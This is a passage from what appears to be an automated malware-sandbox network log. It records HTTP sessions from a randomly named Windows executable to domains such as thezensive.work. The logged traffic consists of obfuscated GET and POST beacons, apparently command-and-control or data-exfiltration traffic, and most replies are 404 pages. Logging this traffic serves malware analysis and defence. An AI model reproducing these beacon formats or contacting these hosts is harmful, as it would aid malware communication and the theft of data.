                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFJosTQxsU%2BmrsVBTV5oOSQfHGQnvO7zdD4ntPc7OQEbEVcRWGZK4O%2BvoCMVraRsCGIPhFDiUUkMjVq7CboCG8vizCYV29w18yJgKcRtB7XRH3EwP%2BIXKPDDglt1ngA3Qc5DAowxCXJd"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e993576ea7b4231-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=8626&min_rtt=8626&rtt_var=4313&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1822&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a
                                                                      Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;
                                                                      Nov 28, 2024 10:07:39.044853926 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      13 | 192.168.2.6 | 49737 | 104.21.6.178 | 80 | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:07:40.332139969 CET | 520 | OUT | GET /vn7h/?8jT4kL=on6JE3FYRodJdM1x+4K+5pUS6O0RuQSqvYhTcMVIKJIhdKL5ISeoZA3c+V1uZgRVwgcePlNUSouM/yl9PRA+Tn5EEaKvDdwkQb22NNObOIpoGQnkHbmo3oyXaFXcK2lCv3NncTU=&-pmdf=w6-PZpOHNlat HTTP/1.1
                                                                      Host: www.topkapiescortg.xyz
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Nov 28, 2024 10:07:41.779943943 CET | 1121 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:41 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=scG9ux1sn6VSXw1I65F1ZZHsjkroTWcvII7CtSm4Fv05xceUvp6QKBGm%2BoRdmbVUcBZldxbMmDR4%2BncqWjmjbpyTCdUybRJ2qfofsMdzM1iZuZO9TjW4J1I85yDXW07D5S7nL2OtSdr%2F"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e993587cd0042c8-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1787&rtt_var=893&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=520&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      14 | 192.168.2.6 | 49738 | 3.75.10.80 | 80 | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:07:47.409003019 CET | 776 | OUT | POST /lo90/ HTTP/1.1
                                                                      Host: www.thezensive.work
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.thezensive.work
                                                                      Referer: http://www.thezensive.work/lo90/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 211
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 74 56 4d 44 66 78 55 4f 69 63 53 59 55 4a 65 49 7a 77 42 68 6e 47 6a 43 76 71 71 42 73 30 6d 52 44 39 43 66 35 65 4e 51 72 34 5a 7a 6f 62 75 65 50 37 77 48 36 61 41 75 7a 5a 41 68 34 39 54 65 39 65 7a 6c 45 51 76 6c 57 74 46 33 61 30 4e 33 35 52 63 6b 6c 35 68 62 6e 6e 68 2b 39 6b 4e 6f 4c 69 31 68 4f 30 6f 6b 4f 4b 33 35 57 73 65 44 32 79 6a 4b 58 6e 4d 47 63 42 4b 67 68 41 70 4b 53 34 7a 50 58 62 69 68 4d 52 6c 66 56 35 62 42 67 6c 67 79 50 67 44 56 66 36 6c 4c 67 77 30 73 45 73 44 51 72 47 6d 44 7a 37 6d 49 71 74 6b 71 78 54 50 65 76 37 6a 4c 69 53 77 76 77 62 63 75 4d 69 34 48 77 44 50 62 36 5a 47 61
                                                                      Data Ascii: 8jT4kL=tVMDfxUOicSYUJeIzwBhnGjCvqqBs0mRD9Cf5eNQr4ZzobueP7wH6aAuzZAh49Te9ezlEQvlWtF3a0N35Rckl5hbnnh+9kNoLi1hO0okOK35WseD2yjKXnMGcBKghApKS4zPXbihMRlfV5bBglgyPgDVf6lLgw0sEsDQrGmDz7mIqtkqxTPev7jLiSwvwbcuMi4HwDPb6ZGa
                                                                      Nov 28, 2024 10:07:48.931809902 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Date: Thu, 28 Nov 2024 09:07:48 GMT
                                                                      Server: Netlify
                                                                      X-Nf-Request-Id: 01JDS0DK4RZ8T2Z8343P1TSEBQ
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      Data Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c [TRUNCATED]
                                                                      Data Ascii: 9b5<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site not found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width: [TRUNCATED]
                                                                      Nov 28, 2024 10:07:48.931824923 CET | 4 | IN | Data Raw: 6e 64 3a 23
                                                                      Data Ascii: nd:#


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      15 | 192.168.2.6 | 49739 | 3.75.10.80 | 80 | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:07:50.076766968 CET | 800 | OUT | POST /lo90/ HTTP/1.1
                                                                      Host: www.thezensive.work
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.thezensive.work
                                                                      Referer: http://www.thezensive.work/lo90/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 74 56 4d 44 66 78 55 4f 69 63 53 59 57 70 75 49 32 51 39 68 77 32 6a 42 32 61 71 42 31 45 6d 4b 44 39 47 66 35 61 64 36 72 71 4e 7a 72 36 65 65 4f 2b 51 48 35 61 41 75 35 35 41 75 6c 4e 53 53 39 65 2f 74 45 53 37 6c 57 74 52 33 61 32 46 33 35 68 67 6e 6c 70 68 64 35 48 68 38 69 30 4e 6f 4c 69 31 68 4f 30 74 4c 4f 4c 66 35 56 66 57 44 77 6a 6a 46 55 6e 4d 5a 4c 78 4b 67 6c 41 70 57 53 34 79 6f 58 61 2b 50 4d 58 35 66 56 35 72 42 67 33 49 78 46 67 44 58 42 4b 6b 44 78 56 42 65 44 2f 79 2f 73 33 32 34 79 61 61 69 6d 37 35 77 74 67 50 39 39 72 44 4a 69 51 6f 64 77 37 63 45 4f 69 41 48 69 55 44 38 31 74 6a 35 67 44 6d 46 6e 78 69 34 74 4b 38 4d 65 67 4a 7a 70 36 53 51 44 77 3d 3d
                                                                      Data Ascii: 8jT4kL=tVMDfxUOicSYWpuI2Q9hw2jB2aqB1EmKD9Gf5ad6rqNzr6eeO+QH5aAu55AulNSS9e/tES7lWtR3a2F35hgnlphd5Hh8i0NoLi1hO0tLOLf5VfWDwjjFUnMZLxKglApWS4yoXa+PMX5fV5rBg3IxFgDXBKkDxVBeD/y/s324yaaim75wtgP99rDJiQodw7cEOiAHiUD81tj5gDmFnxi4tK8MegJzp6SQDw==
                                                                      Nov 28, 2024 10:07:51.489156961 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Date: Thu, 28 Nov 2024 09:07:51 GMT
                                                                      Server: Netlify
                                                                      X-Nf-Request-Id: 01JDS0DNR2ACB1C4SHS4QGMYQY
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      Data Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c [TRUNCATED]
                                                                      Data Ascii: 9b5<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site not found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width: [TRUNCATED]
                                                                      Nov 28, 2024 10:07:51.489181042 CET | 1236 | IN | Data Raw: 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 65 31 65 32 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 31 34 2c 33 30 2c 33 37 2c 2e 31 36 29 7d 61 7b
                                                                      Data Ascii: nd:#fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last
                                                                      Nov 28, 2024 10:07:51.489198923 CET | 512 | IN | Data Raw: 35 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 63 6f 6d 6d 75 6e 69 74 79 5f 74 72 61 63 6b 69 6e 67 22 3e 22 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 20 73 75 70 70 6f 72 74 20 67 75 69
                                                                      Data Ascii: 5?utm_source=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-code request-id"><code>11b01JDS0DNR2ACB1C4SHS4Q


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      16 | 192.168.2.6 | 49740 | 3.75.10.80 | 80 | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:07:52.744823933 CET | 1813 | OUT | POST /lo90/ HTTP/1.1
                                                                      Host: www.thezensive.work
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.thezensive.work
                                                                      Referer: http://www.thezensive.work/lo90/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 1247
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 74 56 4d 44 66 78 55 4f 69 63 53 59 57 70 75 49 32 51 39 68 77 32 6a 42 32 61 71 42 31 45 6d 4b 44 39 47 66 35 61 64 36 72 71 31 7a 6f 4d 4b 65 50 66 51 48 34 61 41 75 6e 70 42 4a 6c 4e 54 49 39 66 58 70 45 53 6e 50 57 75 70 33 61 54 4a 33 37 53 34 6e 77 5a 68 64 6a 6e 68 2f 39 6b 4d 77 4c 69 6c 6c 4f 30 39 4c 4f 4c 66 35 56 5a 79 44 6d 43 6a 46 53 6e 4d 47 63 42 4b 38 68 41 70 71 53 34 62 58 58 61 37 36 4d 68 4a 66 57 64 50 42 76 69 38 78 4e 67 44 52 41 4b 6b 79 78 56 46 46 44 2f 75 4a 73 33 43 65 79 5a 47 69 6b 66 73 79 30 77 4c 41 75 71 43 6b 31 67 6b 59 77 37 4a 7a 4c 52 49 4b 6a 69 54 72 77 63 58 78 6e 32 6d 41 6d 44 2f 39 67 73 77 34 51 47 30 47 6e 34 48 66 41 2b 64 2b 71 6a 54 4d 6c 58 48 72 4c 6c 6f 32 54 63 57 63 4e 51 75 77 6d 59 6f 73 61 6c 52 64 4c 65 33 58 44 74 31 4c 58 43 36 6f 4f 57 6b 55 59 4e 57 4b 73 52 70 4c 62 31 33 36 76 6f 32 2f 4b 58 67 66 34 47 57 4a 76 45 2f 73 32 7a 5a 78 51 61 7a 78 62 57 76 37 34 4b 6b 6d 7a 32 35 55 46 31 6e 56 7a 30 4e 44 61 49 30 [TRUNCATED]
                                                                      Data Ascii: 8jT4kL=tVMDfxUOicSYWpuI2Q9hw2jB2aqB1EmKD9Gf5ad6rq1zoMKePfQH4aAunpBJlNTI9fXpESnPWup3aTJ37S4nwZhdjnh/9kMwLillO09LOLf5VZyDmCjFSnMGcBK8hApqS4bXXa76MhJfWdPBvi8xNgDRAKkyxVFFD/uJs3CeyZGikfsy0wLAuqCk1gkYw7JzLRIKjiTrwcXxn2mAmD/9gsw4QG0Gn4HfA+d+qjTMlXHrLlo2TcWcNQuwmYosalRdLe3XDt1LXC6oOWkUYNWKsRpLb136vo2/KXgf4GWJvE/s2zZxQazxbWv74Kkmz25UF1nVz0NDaI0 [TRUNCATED]
                                                                      Nov 28, 2024 10:07:54.136221886 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Date: Thu, 28 Nov 2024 09:07:53 GMT
                                                                      Server: Netlify
                                                                      X-Nf-Request-Id: 01JDS0DRECV0QCFB3VMWN6DWR9
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      Data Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c [TRUNCATED]
                                                                      Data Ascii: 9b5<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site not found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width: [TRUNCATED]
                                                                      Nov 28, 2024 10:07:54.136240959 CET | 1236 | IN | Data Raw: 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 65 31 65 32 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 31 34 2c 33 30 2c 33 37 2c 2e 31 36 29 7d 61 7b
                                                                      Data Ascii: nd:#fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last
                                                                      Nov 28, 2024 10:07:54.136253119 CET | 512 | IN | Data Raw: 35 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 63 6f 6d 6d 75 6e 69 74 79 5f 74 72 61 63 6b 69 6e 67 22 3e 22 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 20 73 75 70 70 6f 72 74 20 67 75 69
                                                                      Data Ascii: 5?utm_source=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-code request-id"><code>11b01JDS0DRECV0QCFB3VMWN


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      17 | 192.168.2.6 | 49741 | 3.75.10.80 | 80 | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:07:55.409780025 CET | 517 | OUT | GET /lo90/?8jT4kL=gXkjcBwJoJePUPP73D1k4nKT6J/2tj39H9Xv2qxWyJxgoYDAQfNx/5lL6sEukOnTtNLESQT8ae5yfHdk/AMkgP5+8UR/3nx2NgYPLGwKf77yIeyRgEv4SQMvZxGfrREQVLHKYMQ=&-pmdf=w6-PZpOHNlat HTTP/1.1
                                                                      Host: www.thezensive.work
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Nov 28, 2024 10:07:56.785020113 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Date: Thu, 28 Nov 2024 09:07:56 GMT
                                                                      Server: Netlify
                                                                      X-Nf-Request-Id: 01JDS0DTXNT6WHCKFYNRXSQH0S
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
